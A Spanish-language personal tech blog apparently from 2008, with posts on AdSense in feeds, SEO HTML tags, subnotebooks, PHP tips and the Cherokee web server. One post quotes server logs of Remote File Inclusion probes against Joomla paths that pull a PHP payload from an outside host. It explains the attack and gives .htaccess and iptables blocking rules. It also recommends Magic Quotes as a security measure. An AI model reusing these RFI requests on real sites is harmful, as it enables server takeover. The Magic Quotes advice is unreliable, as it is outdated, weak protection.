Ya se ha hablado mucho en la red de la tipografía de los anuncios mostrados por google, comic sans.

Pero bueno me ha tocado verlo, esperemos que esa tipografía no se vuelva la tipografía por defecto, por que realmente se ve muy, muy pero muy…. horrible.

De acuerdo al blog de feedburner propiedad de google, se anuncia que adsense en los feeds se implementara la próxima semana. Los términos y condiciones para los participantes (que en un principio serán pocos) será igual a la de adsense en web.

La pregunta es, ¿Será rentable? mi pronostico es NO ¿la razón?, simplemente creo que los lectores de los feeds los usan (me incluyo) por la comodidad de leer de un solo vistazo sin imágenes innecesarias, de una manera clara y limpia el contenido de la información (posts, noticias, alertas, etc). No creo que el mercado de adsense sea grande en este sector que busca comodidad y limpieza en la lectura.

Habrá que ver de que manera se imprimirán los anuncios en los feeds, aun cuando el diseño no sea del todo molesto, surgirán servicios para filtrar exclusivamente la publicidad en los feeds.

No cabe duda que Google se mete hasta en la sopa, en lo personal uso Google Reader, si empieza a llenarse de publicidad creo que me tendré que mudar de lector de feeds, y no es que esté en contra de la publicidad, para nada, pero me resulta sumamente cómodo leer lo que necesito y nada más, ya que mi trabajo no me deja mucho tiempo para andar navegando entre blogs que aunque tienen buen contenido, las imágenes y la publicidad de todo tipo se encargan de complicarme las cosas.

Solo resta esperar a ver el diseño de los anuncios y la manera en que se muestran.

Hace unos días leí un articulo en ChicaSEO recomendando utilizar tags HTML para mejorar la indexación de los robots de sitios de búsqueda.

El articulo hablaba sobre los tags HTML más importantes, entre los cuales destacaban los tags <title>, atributos keywords y description del tag <meta>, <strong>, <p>, <a>, <h1>, <h2>, <h3> y atributos alt y title

Seomoz nos ofrece un documento en formato PDF con las recomendaciones que a su experiencia ayudan a mejorar el posicionamiento.

En el documento hacen énfasis al número de links que es recomendable tener por página, así como al tamaño del html y al número de variables en una dirección URL, también nos aconsejan usar una estructura del tag <title>, la cual en lo personal lo veo sumamente productiva, ya que nos ofrece reconocer la parte de un sitio simplemente con ver su título. La estructura que recomiendan es la siguiente:

Website Title | Category > Subcategory - Item

Modificar el archivo .htaccess, así como usar un sitemap en formato XML exclusivo para robots y otros tips importantes se pueden apreciar muy bien en el documento.

Yo agregaría usar el tag <acronym> como complemento, aunque se que no es un tag protagonista como los antes mencionados, pero el mal uso de este tag perjudica la óptima indexación de nuestro sitio. En algunos foros y blogs no recomiendan usarlo y pronostican que se perderá en un futuro. Sin embargo mi opinión es que los tags <abbr> y <acronym> son tags que ofrecen que los lectores tengan una lectura más amena. W3C recomienda usar estos tags, sin embargo hay personas que tienen problemas para diferenciar su función y creo que es la principal razón por la cual los buscadores no tengan resultados óptimos en sus algoritmos con estos tags.

La diferencia entre <abbr> y <acronym> es muy simple:

<abrr>: se usa para denotar una abreviación, no hay vuelta de hoja. Ejemplo WWW

<acronym>: se usa para denotar un acrónimo. Un acrónimo son siglas que se leen como una palabra. Ejemplo ovni

El problema surge cuando aplicamos usar <abbr> y <acronym> como remplazo de paréntesis para tener una mejor apariencia.

Mal uso de <abbr> y <acronym> : El día de ayer actualicé mi blog bla bla bla

W3C deja muy claro el correcto uso de estos tags, y los robots de los buscadores se apegan (o deberían) apegarse a él. Es por eso que usar estos tags para fines distintos a los destinados ofuscan los resultados de la indexación web (aunque no es para tanto, pero se debería de usar correctamente).

Un tag que si me parece importantísimo es el tag <em> que en sirve para hacer énfasis a lo que contiene, en otras palabras, usa este tag para resaltar lo importante.

Usar los tags correctamente hace más fácil el trabajo a los robots y ayudamos a tener una blogsfera muy limpia al mismo tiempo que cumplimos los estándares webs.

En el post anterior hablaba de intrusos que buscan detectar vulnerabilidades de algunos scripts.

Bueno pues veo que cada vez hay un mayor número de estas “herramientas” (para kiddies) que no hacen otra cosa que hacernos perder el tiempo.

Voy a dedicar una sección en este blog para hablar acerca de estas herramientas, pero primero, lo primero.

217.118.2.160 - - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 - - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”
217.118.2.160 - - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 - - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”
217.118.2.160 - - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 - - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”

Como podrán ver en esos logs, hacen peticiones hacia archivos específicos. Por el nombre de los directorios se puede deducir claramente que los directorios que buscan pertenecen a la estructura de el CMS Joomla.

Deben de usar un scanner de ips, por que ni siquiera se tomaron la molestia de verificar si en este servidor hay Joomla instalado (no, no hay, ni lo habrá).

Algunos blogs recomiendan bannear ese user-agent “Morfeus Fucking Scanner”, lo cual si serviría temporalmente, ya que cambiando el user-agent del scanner se soluciona el asunto.

Para bloquear ese scanner por medio de su user-agent basta con agregar esto al .htaccess

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
Con estas líneas se le denegaría el acceso al user-agent, pero no a la ip.

Otros recomiendan devolverles el favor a los espías con estas líneas
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (^Morfeus) [NC]
RewriteRule .* http://%{REMOTE_ADDR} [r=301,l]
Con las líneas anteriores se hace un forwarding a la misma ip de donde proviene el ataque. Pero al igual que con el código anterior, solo se le denegará el acceso al user-agent y no a la ip.

Yo recomiendo agregar reglas para banear las ips.
iptables -A INPUT -s LAIP -j DROP

Pero si no tenemos acceso a las iptables, también podremos bannear a los espías mediante el archivo .htaccess de la siguiente manera:

#Morfeus Fucking Hacker
deny from 217.118.2.160

Se que es algo molesto andar editando el archivo cada vez que un nuevo espía se acerque a nosotros, pero es mejor que podemos hacer sino tenemos acceso para bannear desde iptables.

¿Pero que ganan exactamente los espías al encontrar lo que buscan?

Bueno pues pongamos atención a la siguiente línea:

217.118.2.160 - - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”

Lo que buscan hacer se llama RFI (Remote File Inclusion) que consiste según wikipedia en:

Remote File Inclusion, traducido al español como Inclusión Remota de Archivos - vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().

En pocas palabras ellos cuelgan un archivo en otro servidor (En este caso http://dwlz2.dwlz2.com/~dwlz2/ice.txt) que tiene código PHP que permite al atacante tomar control sobre el servidor, o al menos, usar código PHP para construir scripts para funciones específicas (spam, defaces, craking, etc). Verdaderamente es de extrema importancia cuidarnos de este tipo de ataques, ya que muchas cosas se ven comprometidas (Incluso la Base de datos).

Hace unos días comentaba la estrategia de Asus con su subportatil y bueno hoy veo que una de las empresas mas grande en el ramo de los portátiles sale a la competencia, HP.

HP ha anunciado su modelo MiniNotePC que pretende acaparar competir parte del mercado de las subportátiles.

Para comenzar el procesador es VIA, no muy buena elección. Las especificaciones las pueden encontrar en la pagina de HP

Cada vez hay más, apuesto que antes del otro mes vemos respuesta de otra empresa gorda.

Aquí les dejo la lista de mis 10 consejos al programar en PHP (o al menos es lo que pienso que es lo más óptimo).

1. Usa el operador ternario
   

   if ($a < $b) return $a;
   else return $b;

   se podria resumir en:

   return $a < $b ? $a : $b;

2. Usar explode si no se usan expresiones regulares.
   

   La función explode vierte sobre un array los valores contenidos en una cadena delimitados por un separador, la función split hace lo mismo, pero evalúa las expresiones regulares.

3. Si no hay control sobre una variable es recomendable verificar que este inicializada.
   

   usar isset($variable)

4. Si hay que usar condiciones anidadas es preferible usar switch a if’s anidados
   

   usar switch

5. Siempre es bueno codificar claramente, siempre con la idea de que alguien más lo va a ver, aunque no sea así, quien sabe? quizás nos ayude a nosotros mismos más adelante.
   

   Es importante usar nombre de variables y funciones que nos den una idea clara de contenido (variables) y su función.

6. Usar comillas simples es mucho más rapido.
   

   Cuando se usan comillas dobles antes de procesar se revisa la cadena en busca de variables para devolver el valor de ellas. En comillas simples no se hace tal revisión.

7. Datos especiales
   

   cuando elaboramos archivos con datos especiales (por ejemplo un config), es preferible usar constantes.
   define(’DBHOST’,'localhost’) en vez de $dbhost = ‘localhost’;

8. Cabecera de los archivos.
   

   Es recomendable poner datos que identifiquen al archivo con el proyecto, ademas que es una manera rápida para añadir información que ayude a identificar el contenido del archivo.
   /**
   *
   * @Project My Web Project. @db_functions.php - Funciones para controlar la base de datos.
   * @version: 0.0001 @modificado: 1 enero 2008
   * @author: John Doe
   *
   */

9. No escatimes en código por seguridad
   

   Aunque tu proyecto sea pequeño, trata de tomar todas las medidas necesarias, usar Magic Quotes es sano. Recuerda que el nivel de seguridad de un sistema, es directamente proporcional a la paranoia de su administrador.

10. Optimiza Código
    

    Trata de ahorrar algunos Kbytes a tus archivos, optimiza tu código al máximo, usa expresiones regulares, recursividad, y classes.

Entre módulos que no ocupo, procesos innecesarios en mi servidor, y configuraciones por demás sobradas, mi servidor web esta funcionando un poco más lento que de lo normal.

Buscando un poco por la red encontré Cherokee, un magnífico Servidor Web escrito enteramente en lenguaje C que cuenta con todas las características necesarias para montar un CMS como WordPress, el favorito de los bloggers.

¿Que ofrece?

Para empezar, es super rápido (mucho más que mi configuración actual de Apache), fácil de instalar y configurar. Soporta CGI, FastCGI, SCGI, PHP, CGI, y conexiones seguras (encriptadas) TLS y SSL.

No es un secreto la importancia de tener servidores rápidos, sobre todo en la comunidad bloggera. Ayuda muchísimo a los lectores de nuestro blog, uno o dos segundos realmente cuentan.

Actualmente cuento con un servidor dedicado donde alojo este blog y varios sitios de amigos. Los blogs robustos con muchos miles de visitas diarias seguramente usaran Lighttpd, sin embargo Cherokee en su versión actual 0.6 puede ser considerado una opción para los bloggers que cuentan con un servidor dedicado propio y quieren aumentar la velocidad y rendimiento, además de ser un proyecto hispano.

Me agradó mucho su interfaz de administración bastante “user-friendly” desde la cual configurar Mime Types, Servidores Virtuales, alias, y demás parametros requeridos ,según nuestras necesidades, es muy intuitivo, rápido y fácil.

Por todas las características, considero que Cherokee debería ser una opción importante para la comunidad bloggera.

Hace unas semanas me decidí a adquirir un subportátil, la decisión no era tan difícil una vez que conoces perfectamente tus necesidades y lo que las empresas ofrecen.

Básicamente en ese tiempo (ahora Toshiba se sumó a este campo con su R500)  había tres opciones:

• Sony Vaio TZ: Una computadora muy pequeña sin dejar de ser potente, con sistema operativo Windows Vista Business, tecnología Centrino Duo, que es un conjunto de chip’s de la marca intel (Procesador, Tarjeta de video y Wifi), 1GB de memoria RAM, disco duro 100GB, unidad óptica DVD +/-RW DL/RAM,  entrada para tarjetas xpress card, lector de tarjetas,  2 entradas usb, cámara integrada, salida VGA para un monitor externo y muchas, muchas cosas más… Wow! de verdad fuera perfecta a no ser por su precio.
• Asus Eeepc Series: En realidad que es una computadora muy muy pequeña y liviana, sistema operativo Linux Xandros, procesador Intel a 900Mhz, 512 RAM, Disco duro de 4GB, 3 puertos usb, salida VGA para un monitor externo, Wifi, Cámara y micrófono integrado, lector de tarjetas SD, entrada de audífonos y micrófono y lo mejor su precio. Realmente una ganga.

Bueno no considere al MacBook Air ya que definitivamente sacrifica demasiado la conectividad, muy muy pobre, pero eso si, Apple puede asegurar que tiene el subportátil mas delgado del mundo. Se que Apple tiene herramientas para aprovechar los recursos de otras Mac’s (o PC’s) tal como lo es la unidad óptica, y es que un subportátil es un equipo auxiliar, y no se debería usar como computadora principal donde tienes todos tus archivos, trabajos, etc., esto queda muy claro, sin embargo dentro de la portabilidad, también busco garantizar conectividad a donde quiera que vaya, y Apple no me ofrece lo que busco con este producto. Aunque eso si, mi computadora personal para uso rudo (y ahí si que buscaba potencia)  es un MacBook Pro y  estoy muy satisfecho por la compra.

Considerando que lo busco es conectividad, portabilidad y precio, pues lo tuve muy claro.

Asus Eeepc apostó por el precio, no es una computadora muy potente pero realiza muy bien su trabajo. Tomando en cuenta que hay muchos servicios "on line" pues no es necesario sacrificar tanto disco duro. Google docs, e-mail, algo de multimedia (last.fm me viene perfecto),  YouTube, Google Reader, y un sin fin de servicios gratuitos que están a disposición de "casi" cualquiera.

Pero… ¿Que ha hecho mal Sony? nada, en serio no es una broma no hizo nada, y precisamente fue el "no hacer nada" por lo que ahora tiene que sufrir las consecuencias. Sony y su línea "VAIO" siguió su formula de siempre, crear productos de alta calidad, de pequeño tamaño,  siempre incluyendo lo mejor de lo último, añadirle "Windows" y walla!. Sin embargo que creen uds. que sea más probable ¿Que millones de empresarios compren una laptop de casi 4000 Dlls? o ¿Que millones de usuarios comunes y corrientes (bloggers, estudiantes, profesores, etc) compren un subportátil de casi 400Dlls?

La respuesta es más que obvia, Sony ofrece productos muy buenos pero también muy caros, y al parecer están convencidos que el error no es de ellos, pienso que deberían cambiar de visión. Ajustarse a las necesidades (y posibilidades) de la mayoría, no es una regla de oro aquello de que "Calidad siempre es mejor que cantidad" al menos Sony para mí, perdió el camino.

Ahh si se me olvidaba, aquí les dejo una foto de mi Asus Eeepc con Windows Fundamentals for Legacy PC’s, que es un Windows XP optimizado para funcionar en máquinas con pocos y limitados recursos. Xandros me gustó mucho,  pero para lo que uso este subportátil me viene mejor Windows.